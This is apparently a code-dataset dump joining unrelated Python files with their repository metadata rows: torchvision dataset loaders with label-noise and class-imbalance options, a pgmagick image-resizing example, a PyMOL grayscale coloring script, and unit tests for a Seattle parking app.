test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te
def get_FASHION_MNIST(path, tr_load_args = None, te_load_args = None):
"""
Downloads FASHION_MNIST dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 10
# Download the FASHION_MNIST dataset
data_tr = datasets.FashionMNIST(path + '/FASHION_MNIST', train=True, download=True)
data_te = datasets.FashionMNIST(path + '/FASHION_MNIST', train=False, download=True)
# Obtain the raw data
X_tr = data_tr.data.numpy()
Y_tr = data_tr.targets.numpy()
X_te = data_te.data.numpy()
Y_te = data_te.targets.numpy()
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te
def get_CIFAR10(path, tr_load_args = None, te_load_args = None):
"""
Downloads CIFAR10 dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 10
# Download the CIFAR10 dataset
data_tr = datasets.CIFAR10(path + '/CIFAR10', train=True, download=True)
data_te = datasets.CIFAR10(path + '/CIFAR10', train=False, download=True)
# Obtain the raw data
X_tr = data_tr.data
Y_tr = data_tr.targets
X_te = data_te.data
Y_te = data_te.targets
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te
def get_CIFAR100(path, tr_load_args = None, te_load_args = None):
"""
Downloads CIFAR100 dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 100
# Download the CIFAR100 dataset
data_tr = datasets.CIFAR100(path + '/CIFAR100', train=True, download=True)
data_te = datasets.CIFAR100(path + '/CIFAR100', train=False, download=True)
# Obtain the raw data
X_tr = data_tr.data
Y_tr = data_tr.targets
X_te = data_te.data
Y_te = data_te.targets
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te
def get_STL10(path, tr_load_args = None, te_load_args = None):
"""
Downloads STL10 dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 100
# Download the STL10 dataset
data_tr = datasets.STL10(path + '/STL10', split="train", download=True)
data_te = datasets.STL10(path + '/STL10', split="test", download=True)
# Obtain the raw data
X_tr = data_tr.data
Y_tr = data_tr.labels
X_te = data_te.data
Y_te = data_te.labels
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te | 34.138714 | 108 | 0.630799 | 4,077 | 27,072 | 3.929605 | 0.058131 | 0.02116 | 0.031833 | 0.016978 | 0.891642 | 0.871356 | 0.850946 | 0.834218 | 0.821235 | 0.811248 | 0 | 0.007871 | 0.281952 | 27,072 | 793 | 109 | 34.138714 | 0.816297 | 0.320294 | 0 | 0.777448 | 0 | 0 | 0.07634 | 0.0354 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035608 | false | 0 | 0.017804 | 0 | 0.106825 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bbc5b39c1b46ef10ebe396b7a3b4aa45fe6dee0c | 675 | py | Python | example/pgmagick_prof.py | veryhappythings/pgmagick | 5dce5fa4681400b4c059431ad69233e6a3e5799a | [
"MIT"
] | 136 | 2015-07-15T12:49:36.000Z | 2022-03-24T12:30:25.000Z | example/pgmagick_prof.py | veryhappythings/pgmagick | 5dce5fa4681400b4c059431ad69233e6a3e5799a | [
"MIT"
] | 59 | 2015-12-28T21:40:37.000Z | 2022-03-31T13:11:50.000Z | example/pgmagick_prof.py | veryhappythings/pgmagick | 5dce5fa4681400b4c059431ad69233e6a3e5799a | [
"MIT"
] | 33 | 2015-12-04T08:00:07.000Z | 2022-01-28T23:39:25.000Z | import sys
from pgmagick import Image, FilterTypes as ft
# same
# convert SRC.jpg -filter Sinc -resize 500x500 -sharpen 1 -quality 100 DST.jpg
# gm convert SRC.jpg -filter Sinc -resize 500x500 -sharpen 1 -quality 100 DST.jpg
im = Image('./X.jpg')
im.quality(100)
im.sharpen(1.0)
im.write('./Y.jpg')
im = Image('./X.jpg')
im.quality(100)
im.filterType(ft.SincFilter)
im.scale('1000x1000')
im.sharpen(1.0)
im.write('./Y.jpg')
im = Image('./X.jpg')
im.quality(100)
im.filterType(ft.SincFilter)
im.scale('100x100')
im.sharpen(1.0)
im.write('./Y.jpg')
im = Image('./X.jpg')
im.quality(100)
im.filterType(ft.SincFilter)
im.scale('500x500')
im.sharpen(1.0)
im.write('./Y.jpg')
| 20.454545 | 81 | 0.694815 | 118 | 675 | 3.974576 | 0.271186 | 0.085288 | 0.085288 | 0.093817 | 0.837953 | 0.837953 | 0.837953 | 0.837953 | 0.791045 | 0.742004 | 0 | 0.099338 | 0.105185 | 675 | 32 | 82 | 21.09375 | 0.677152 | 0.238519 | 0 | 0.791667 | 0 | 0 | 0.154902 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bbec8a05205e1072a3e3c6e78e9224cd72818a46 | 10,595 | py | Python | MolecularRepresentation/grayscalepy.py | MooersLab/jupyterlabpymolpysnipsplus | b886750d63372434df53d4d6d7cdad6cb02ae4e7 | [
"MIT"
] | null | null | null | MolecularRepresentation/grayscalepy.py | MooersLab/jupyterlabpymolpysnipsplus | b886750d63372434df53d4d6d7cdad6cb02ae4e7 | [
"MIT"
] | null | null | null | MolecularRepresentation/grayscalepy.py | MooersLab/jupyterlabpymolpysnipsplus | b886750d63372434df53d4d6d7cdad6cb02ae4e7 | [
"MIT"
] | null | null | null | # Description: Apply grayscale coloring using a grayscale version of the PyMOL colors for the elements. This is a Python function. It is invoked in a script file via gscale(). There is a corresponding gscale shortcut in pymolshortcuts.py that is invoked in a pml script by entering gsale if the functions in pymolshortcuts.py have been loaded with the run pymolshortcuts.py command.
# Source: https://www.pymolwiki.org/index.php/Symmetry_Axis
"""
cmd.do('def grayscale(selection="all"):')
cmd.do(' """Apply by entering grayscale()"""')
cmd.do(' cmd.color("grey64", "elem Ac")')
cmd.do(' cmd.color("grey67", "elem Al")')
cmd.do(' cmd.color("grey39", "elem Am")')
cmd.do(' cmd.color("grey46", "elem Sb")')
cmd.do(' cmd.color("grey75", "elem Ar")')
cmd.do(' cmd.color("grey58", "elem As")')
cmd.do(' cmd.color("grey33", "elem At")')
cmd.do(' cmd.color("grey56", "elem Ba")')
cmd.do(' cmd.color("grey40", "elem Bk")')
cmd.do(' cmd.color("grey87", "elem Be")')
cmd.do(' cmd.color("grey40", "elem Bi")')
cmd.do(' cmd.color("grey20", "elem Bh")')
cmd.do(' cmd.color("grey77", "elem B")')
cmd.do(' cmd.color("grey26", "elem Br")')
cmd.do(' cmd.color("grey86", "elem Cd")')
cmd.do(' cmd.color("grey76", "elem Ca")')
cmd.do(' cmd.color("grey34", "elem Cf")')
cmd.do(' cmd.color("grey77", "elem C")')
cmd.do(' cmd.color("grey98", "elem Ce")')
cmd.do(' cmd.color("grey17", "elem Cs")')
cmd.do(' cmd.color("grey70", "elem Cl")')
cmd.do(' cmd.color("grey60", "elem Cr")')
cmd.do(' cmd.color("grey64", "elem Co")')
cmd.do(' cmd.color("grey54", "elem Cu")')
cmd.do(' cmd.color("grey42", "elem Cm")')
cmd.do(' cmd.color("grey89", "elem D")')
cmd.do(' cmd.color("grey19", "elem Db")')
cmd.do(' cmd.color("grey79", "elem Dy")')
cmd.do(' cmd.color("grey29", "elem Es")')
cmd.do(' cmd.color("grey67", "elem Er")')
cmd.do(' cmd.color("grey85", "elem Eu")')
cmd.do(' cmd.color("grey28", "elem Fm")')
cmd.do(' cmd.color("grey93", "elem F")')
cmd.do(' cmd.color("grey8", "elem Fr")')
cmd.do(' cmd.color("grey82", "elem Gd")')
cmd.do(' cmd.color("grey60", "elem Ga")')
cmd.do(' cmd.color("grey52", "elem Ge")')
cmd.do(' cmd.color("grey80", "elem Au")')
cmd.do(' cmd.color("grey68", "elem Hf")')
cmd.do(' cmd.color("grey20", "elem Hs")')
cmd.do(' cmd.color("grey96", "elem He")')
cmd.do(' cmd.color("grey75", "elem Ho")')
cmd.do(' cmd.color("grey89", "elem H")')
cmd.do(' cmd.color("grey49", "elem In")')
cmd.do(' cmd.color("grey16", "elem I")')
cmd.do(' cmd.color("grey29", "elem Ir")')
cmd.do(' cmd.color("grey48", "elem Fe")')
cmd.do(' cmd.color("grey65", "elem Kr")')
cmd.do(' cmd.color("grey76", "elem La")')
cmd.do(' cmd.color("grey19", "elem Lr")')
cmd.do(' cmd.color("grey34", "elem Pb")')
cmd.do(' cmd.color("grey60", "elem Li")')
cmd.do(' cmd.color("grey48", "elem Lu")')
cmd.do(' cmd.color("grey83", "elem Mg")')
cmd.do(' cmd.color("grey52", "elem Mn")')
cmd.do(' cmd.color("grey20", "elem Mt")')
cmd.do(' cmd.color("grey23", "elem Md")')
cmd.do(' cmd.color("grey72", "elem Hg")')
cmd.do(' cmd.color("grey62", "elem Mo")')
cmd.do(' cmd.color("grey93", "elem Nd")')
cmd.do(' cmd.color("grey85", "elem Ne")')
cmd.do(' cmd.color("grey43", "elem Np")')
cmd.do(' cmd.color("grey67", "elem Ni")')
cmd.do(' cmd.color("grey69", "elem Nb")')
cmd.do(' cmd.color("grey25", "elem N")')
cmd.do(' cmd.color("grey23", "elem No")')
cmd.do(' cmd.color("grey36", "elem Os")')
cmd.do(' cmd.color("grey44", "elem O")')
cmd.do(' cmd.color("grey33", "elem Pd")')
cmd.do(' cmd.color("grey57", "elem P")')
cmd.do(' cmd.color("grey82", "elem Pt")')
cmd.do(' cmd.color("grey37", "elem Pu")')
cmd.do(' cmd.color("grey40", "elem Po")')
cmd.do(' cmd.color("grey35", "elem K")')
cmd.do(' cmd.color("grey95", "elem Pr")')
cmd.do(' cmd.color("grey90", "elem Pm")')
cmd.do(' cmd.color("grey52", "elem Pa")')
cmd.do(' cmd.color("grey35", "elem Ra")')
cmd.do(' cmd.color("grey46", "elem Rn")')
cmd.do(' cmd.color("grey43", "elem Re")')
cmd.do(' cmd.color("grey39", "elem Rh")')
cmd.do(' cmd.color("grey27", "elem Rb")')
cmd.do(' cmd.color("grey47", "elem Ru")')
cmd.do(' cmd.color("grey19", "elem Rf")')
cmd.do(' cmd.color("grey89", "elem Sm")')
cmd.do(' cmd.color("grey90", "elem Sc")')
cmd.do(' cmd.color("grey20", "elem Sg")')
cmd.do(' cmd.color("grey66", "elem Se")')
cmd.do(' cmd.color("grey80", "elem Si")')
cmd.do(' cmd.color("grey75", "elem Ag")')
cmd.do(' cmd.color("grey46", "elem Na")')
cmd.do(' cmd.color("grey71", "elem Sr")')
cmd.do(' cmd.color("grey76", "elem S")')
cmd.do(' cmd.color("grey60", "elem Ta")')
cmd.do(' cmd.color("grey53", "elem Tc")')
cmd.do(' cmd.color("grey51", "elem Te")')
cmd.do(' cmd.color("grey81", "elem Tb")')
cmd.do(' cmd.color("grey39", "elem Tl")')
cmd.do(' cmd.color("grey59", "elem Th")')
cmd.do(' cmd.color("grey61", "elem Tm")')
cmd.do(' cmd.color("grey48", "elem Sn")')
cmd.do(' cmd.color("grey75", "elem Ti")')
cmd.do(' cmd.color("grey50", "elem W")')
cmd.do(' cmd.color("grey47", "elem U")')
cmd.do(' cmd.color("grey65", "elem V")')
cmd.do(' cmd.color("grey54", "elem Xe")')
cmd.do(' cmd.color("grey55", "elem Yb")')
cmd.do(' cmd.color("grey91", "elem Y")')
cmd.do(' cmd.color("grey51", "elem Zn")')
cmd.do(' cmd.color("grey81", "elem Zr")')
cmd.do('cmd.extend("grayscale",grayscale)')
"""
cmd.do('def grayscale(selection="all"):')
cmd.do(' """Apply by entering grayscale()"""')
cmd.do(' cmd.color("grey64", "elem Ac")')
cmd.do(' cmd.color("grey67", "elem Al")')
cmd.do(' cmd.color("grey39", "elem Am")')
cmd.do(' cmd.color("grey46", "elem Sb")')
cmd.do(' cmd.color("grey75", "elem Ar")')
cmd.do(' cmd.color("grey58", "elem As")')
cmd.do(' cmd.color("grey33", "elem At")')
cmd.do(' cmd.color("grey56", "elem Ba")')
cmd.do(' cmd.color("grey40", "elem Bk")')
cmd.do(' cmd.color("grey87", "elem Be")')
cmd.do(' cmd.color("grey40", "elem Bi")')
cmd.do(' cmd.color("grey20", "elem Bh")')
cmd.do(' cmd.color("grey77", "elem B")')
cmd.do(' cmd.color("grey26", "elem Br")')
cmd.do(' cmd.color("grey86", "elem Cd")')
cmd.do(' cmd.color("grey76", "elem Ca")')
cmd.do(' cmd.color("grey34", "elem Cf")')
cmd.do(' cmd.color("grey77", "elem C")')
cmd.do(' cmd.color("grey98", "elem Ce")')
cmd.do(' cmd.color("grey17", "elem Cs")')
cmd.do(' cmd.color("grey70", "elem Cl")')
cmd.do(' cmd.color("grey60", "elem Cr")')
cmd.do(' cmd.color("grey64", "elem Co")')
cmd.do(' cmd.color("grey54", "elem Cu")')
cmd.do(' cmd.color("grey42", "elem Cm")')
cmd.do(' cmd.color("grey89", "elem D")')
cmd.do(' cmd.color("grey19", "elem Db")')
cmd.do(' cmd.color("grey79", "elem Dy")')
cmd.do(' cmd.color("grey29", "elem Es")')
cmd.do(' cmd.color("grey67", "elem Er")')
cmd.do(' cmd.color("grey85", "elem Eu")')
cmd.do(' cmd.color("grey28", "elem Fm")')
cmd.do(' cmd.color("grey93", "elem F")')
cmd.do(' cmd.color("grey8", "elem Fr")')
cmd.do(' cmd.color("grey82", "elem Gd")')
cmd.do(' cmd.color("grey60", "elem Ga")')
cmd.do(' cmd.color("grey52", "elem Ge")')
cmd.do(' cmd.color("grey80", "elem Au")')
cmd.do(' cmd.color("grey68", "elem Hf")')
cmd.do(' cmd.color("grey20", "elem Hs")')
cmd.do(' cmd.color("grey96", "elem He")')
cmd.do(' cmd.color("grey75", "elem Ho")')
cmd.do(' cmd.color("grey89", "elem H")')
cmd.do(' cmd.color("grey49", "elem In")')
cmd.do(' cmd.color("grey16", "elem I")')
cmd.do(' cmd.color("grey29", "elem Ir")')
cmd.do(' cmd.color("grey48", "elem Fe")')
cmd.do(' cmd.color("grey65", "elem Kr")')
cmd.do(' cmd.color("grey76", "elem La")')
cmd.do(' cmd.color("grey19", "elem Lr")')
cmd.do(' cmd.color("grey34", "elem Pb")')
cmd.do(' cmd.color("grey60", "elem Li")')
cmd.do(' cmd.color("grey48", "elem Lu")')
cmd.do(' cmd.color("grey83", "elem Mg")')
cmd.do(' cmd.color("grey52", "elem Mn")')
cmd.do(' cmd.color("grey20", "elem Mt")')
cmd.do(' cmd.color("grey23", "elem Md")')
cmd.do(' cmd.color("grey72", "elem Hg")')
cmd.do(' cmd.color("grey62", "elem Mo")')
cmd.do(' cmd.color("grey93", "elem Nd")')
cmd.do(' cmd.color("grey85", "elem Ne")')
cmd.do(' cmd.color("grey43", "elem Np")')
cmd.do(' cmd.color("grey67", "elem Ni")')
cmd.do(' cmd.color("grey69", "elem Nb")')
cmd.do(' cmd.color("grey25", "elem N")')
cmd.do(' cmd.color("grey23", "elem No")')
cmd.do(' cmd.color("grey36", "elem Os")')
cmd.do(' cmd.color("grey44", "elem O")')
cmd.do(' cmd.color("grey33", "elem Pd")')
cmd.do(' cmd.color("grey57", "elem P")')
cmd.do(' cmd.color("grey82", "elem Pt")')
cmd.do(' cmd.color("grey37", "elem Pu")')
cmd.do(' cmd.color("grey40", "elem Po")')
cmd.do(' cmd.color("grey35", "elem K")')
cmd.do(' cmd.color("grey95", "elem Pr")')
cmd.do(' cmd.color("grey90", "elem Pm")')
cmd.do(' cmd.color("grey52", "elem Pa")')
cmd.do(' cmd.color("grey35", "elem Ra")')
cmd.do(' cmd.color("grey46", "elem Rn")')
cmd.do(' cmd.color("grey43", "elem Re")')
cmd.do(' cmd.color("grey39", "elem Rh")')
cmd.do(' cmd.color("grey27", "elem Rb")')
cmd.do(' cmd.color("grey47", "elem Ru")')
cmd.do(' cmd.color("grey19", "elem Rf")')
cmd.do(' cmd.color("grey89", "elem Sm")')
cmd.do(' cmd.color("grey90", "elem Sc")')
cmd.do(' cmd.color("grey20", "elem Sg")')
cmd.do(' cmd.color("grey66", "elem Se")')
cmd.do(' cmd.color("grey80", "elem Si")')
cmd.do(' cmd.color("grey75", "elem Ag")')
cmd.do(' cmd.color("grey46", "elem Na")')
cmd.do(' cmd.color("grey71", "elem Sr")')
cmd.do(' cmd.color("grey76", "elem S")')
cmd.do(' cmd.color("grey60", "elem Ta")')
cmd.do(' cmd.color("grey53", "elem Tc")')
cmd.do(' cmd.color("grey51", "elem Te")')
cmd.do(' cmd.color("grey81", "elem Tb")')
cmd.do(' cmd.color("grey39", "elem Tl")')
cmd.do(' cmd.color("grey59", "elem Th")')
cmd.do(' cmd.color("grey61", "elem Tm")')
cmd.do(' cmd.color("grey48", "elem Sn")')
cmd.do(' cmd.color("grey75", "elem Ti")')
cmd.do(' cmd.color("grey50", "elem W")')
cmd.do(' cmd.color("grey47", "elem U")')
cmd.do(' cmd.color("grey65", "elem V")')
cmd.do(' cmd.color("grey54", "elem Xe")')
cmd.do(' cmd.color("grey55", "elem Yb")')
cmd.do(' cmd.color("grey91", "elem Y")')
cmd.do(' cmd.color("grey51", "elem Zn")')
cmd.do(' cmd.color("grey81", "elem Zr")')
cmd.do('cmd.extend("grayscale",grayscale)')
| 45.472103 | 383 | 0.566871 | 1,648 | 10,595 | 3.643811 | 0.141384 | 0.188177 | 0.295754 | 0.47627 | 0.94055 | 0.94055 | 0.94055 | 0.94055 | 0.94055 | 0.94055 | 0 | 0.048868 | 0.154035 | 10,595 | 232 | 384 | 45.668103 | 0.621109 | 0.041529 | 0 | 0.982301 | 0 | 0 | 0.872857 | 0.010207 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
a53dc7785f692d9051f2ea3d902b2597ee777d79 | 4,499 | py | Python | seattlepark/tests/test_parking_app.py | qhsun/seattleparking | c063e74aa85995cdfe3cd295c2bd74f247ff09df | [
"MIT"
] | 1 | 2022-01-26T06:22:21.000Z | 2022-01-26T06:22:21.000Z | seattlepark/tests/test_parking_app.py | qhsun/seattleparking | c063e74aa85995cdfe3cd295c2bd74f247ff09df | [
"MIT"
] | null | null | null | seattlepark/tests/test_parking_app.py | qhsun/seattleparking | c063e74aa85995cdfe3cd295c2bd74f247ff09df | [
"MIT"
] | 1 | 2021-05-02T07:49:34.000Z | 2021-05-02T07:49:34.000Z | import unittest
from unittest.mock import Mock
from parking_spot import ParkingSpot
from parking_app import create_parking_spots
class StreetParkingUITest(unittest.TestCase):
def test_create_parking_spots_success(self):
n_clicks = 1
destination = "Street0"
accept_distance = "0.2"
cu = Mock()
distance = 0.5
coordinates = [[1.1, 1.2], [1.3, 1.4]]
street_name = "Street Name1"
street_lat_mid = 1.5
street_lon_mid = 1.6
ps1 = ParkingSpot(distance, coordinates, street_name,
street_lat_mid, street_lon_mid)
distance = 1.5
coordinates = [[2.1, 2.2], [2.3, 2.4]]
street_name = "Street Name2"
street_lat_mid = 2.5
street_lon_mid = 2.6
ps2 = ParkingSpot(distance, coordinates, street_name,
street_lat_mid, street_lon_mid)
spots = [ps1, ps2]
destination_coordinates = [3.1, 3.2]
cu.get_parking_spots.return_value = (spots, destination_coordinates)
streets, notification = \
create_parking_spots(n_clicks,
destination, accept_distance, cu)
data = streets["data"]
lat1 = data[0]["lat"]
lon1 = data[0]["lon"]
self.assertEqual([lat1, lon1], [[1.1, 1.2], [1.3, 1.4]])
lat2 = data[1]["lat"]
lon2 = data[1]["lon"]
self.assertEqual([lat2, lon2], [[2.1, 2.2], [2.3, 2.4]])
lat3 = data[2]["lat"][0]
lon3 = data[2]["lon"][0]
self.assertEqual([lat3, lon3], [3.1, 3.2])
def test_create_parking_spots_button_not_clicked(self):
n_clicks = 0
destination = "I love sushi seattle"
accept_distance = "0.2"
cu = Mock()
streets, notification = \
create_parking_spots(n_clicks,
destination, accept_distance, cu)
data = streets["data"]
lat = data[0]["lat"]
lon = data[0]["lon"]
self.assertEqual([lat, lon], [[], []])
def test_create_parking_spots_invalid_address(self):
n_clicks = 1
destination = "I love sushi seattle"
accept_distance = "0.2"
cu = Mock()
distance = 0.5
coordinates = [[1.1, 1.2], [1.3, 1.4]]
street_name = "Street Name1"
street_lat_mid = 1.5
street_lon_mid = 1.6
ps1 = ParkingSpot(distance, coordinates, street_name,
street_lat_mid, street_lon_mid)
distance = 1.5
coordinates = [[2.1, 2.2], [2.3, 2.4]]
street_name = "Street Name2"
street_lat_mid = 2.5
street_lon_mid = 2.6
ps2 = ParkingSpot(distance, coordinates, street_name,
street_lat_mid, street_lon_mid)
spots = [ps1, ps2]
destination_coordinates = None
cu.get_parking_spots.return_value = (spots, destination_coordinates)
streets, notification = \
create_parking_spots(n_clicks,
destination, accept_distance, cu)
data = streets["data"]
lat = data[0]["lat"]
lon = data[0]["lon"]
self.assertEqual([lat, lon], [[], []])
def test_create_parking_spots_invalid_spots_returned(self):
n_clicks = 1
destination = "I love sushi seattle"
accept_distance = "0.2"
cu = Mock()
spots = None
destination_coordinates = [3.1, 3.2]
cu.get_parking_spots.return_value = (spots, destination_coordinates)
streets, notification = \
create_parking_spots(n_clicks,
destination, accept_distance, cu)
data = streets["data"]
lat = data[0]["lat"]
lon = data[0]["lon"]
self.assertEqual([lat, lon], [[], []])
def test_create_parking_spots_no_spots_available(self):
n_clicks = 1
destination = "I love sushi seattle"
accept_distance = "0.2"
cu = Mock()
spots = []
destination_coordinates = [3.1, 3.2]
cu.get_parking_spots.return_value = (spots, destination_coordinates)
streets, notification = \
create_parking_spots(n_clicks,
destination, accept_distance, cu)
data = streets["data"]
lat = data[0]["lat"]
lon = data[0]["lon"]
self.assertEqual([lat, lon], [[], []])
if __name__ == "__main__":
unittest.main()
